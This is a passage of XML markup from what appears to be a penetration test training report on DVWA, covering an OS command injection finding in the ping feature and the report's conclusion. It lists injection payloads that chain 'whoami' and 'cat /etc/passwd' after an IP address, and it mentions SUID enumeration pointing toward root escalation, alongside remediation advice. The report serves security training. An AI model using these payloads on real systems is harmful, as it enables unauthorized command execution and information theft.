    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 OS Command Injection — Ping Utility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="C0392B" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">SEVERITY: CRITICAL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2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">/dvwa/vulnerabilities/exec/  (IP address input field)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">CWE-78: OS Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">ip (POST parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6500"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">www-data (web server user)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 'Ping for FREE' feature passes user input directly into a system-level ping command without sanitization. By appending shell metacharacters, arbitrary operating system commands can be executed with the privileges of the web server process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Confirm command chaining is possible:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1; whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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1971675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10: Normal ping output is followed by 'www-data' — the output of the injected whoami command, confirming arbitrary command execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Demonstrate information disclosure impact by reading a sensitive system file:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EFEFEF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1; cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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28900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 11: Full contents of /etc/passwd disclosed, listing every system and application account on the host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Further enumeration (find / -perm -4000 -type f) identified several SUID root binaries on the system, including /usr/bin/nmap (version 4.53) and /usr/bin/sudo, indicating a plausible path from this initial web-based foothold to full root privilege escalation on the underlying host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full arbitrary command execution on the underlying server, far beyond the intended scope of a simple ping utility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disclosure of all system and application account names, aiding further attacks (e.g., targeted brute-force against identified accounts).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establishes a foothold that could plausibly be escalated to full root access via known SUID binary misconfigurations present on the host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never pass user input directly into a system shell call. Use language-native networking libraries instead of shelling out to ping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If shelling out is unavoidable, strictly validate input against an allowlist (e.g., a proper IPv4/IPv6 regex) and use parameterized execution APIs that do not invoke a shell interpreter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the web server process with the minimum privileges necessary, and remove unnecessary SUID bits from binaries not required to run as root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This assessment identified five vulnerabilities in DVWA, spanning three of the most critical OWASP Top 10 categories: Injection, Broken Access Control, and Cross-Site Scripting. Two findings — SQL Injection and OS Command Injection — were rated Critical, as both provided direct access to sensitive data and underlying system resources beyond the application's intended scope. The remaining three findings (Reflected XSS, Stored XSS, and CSRF) were rated High, each demonstrating realistic account-compromise scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A key theme across this assessment is that these vulnerabilities are not independent of one another: the plaintext admin password recovered via SQL Injection was shown to materially increase the exploitability of the CSRF finding even at the application's High security setting, illustrating how individually 'moderate-risk' issues can compound into more severe, realistic attack chains. Similarly, the shell access obtained via Command Injection was shown to lead toward a plausible privilege escalation path through a misconfigured SUID Nmap binary, though full escalation to root was not completed within the scope of this assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All five findings share a common root cause: a lack of proper input validation, output encoding, and request-origin verification. Addressing these systematically — via parameterized queries, output encoding, anti-CSRF tokens, and least-privilege configuration — would remediate the underlying weakness across all findings, not just the specific instances documented here.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8C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Confidential — Internal Training Use Only    |    Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>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C8D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">DVWA Penetration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35f48bcb16d74d19f539a9624799a6feda1028.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d24b863d799209204ae50331645deeab2724df28.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/54933cd33270337b6e4f299add49d6cb8a2a3629.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d6097130f9d134d726875c34fc633c17e39653fd.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a0608d3023753c318c90e1493e6c8a08e97ee4d9.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/378969815a74f8a45c815eb2927459135cd3d1ac.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cf0bc3e278681a1020a2ee96460a12fdb237a239.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7e06cb12ff4ded0ef6683086bebd55f691ce4402.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9d7238fc3fbc4310edca4998b399d524d68e625d.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d8755f9d0fd0262545736d63990c02e1c2d589ee.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/2c69453367f84670c1431e60b2c256896dc7dc7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2026-07-11T10:06:41.262Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-11T10:06:41.274Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>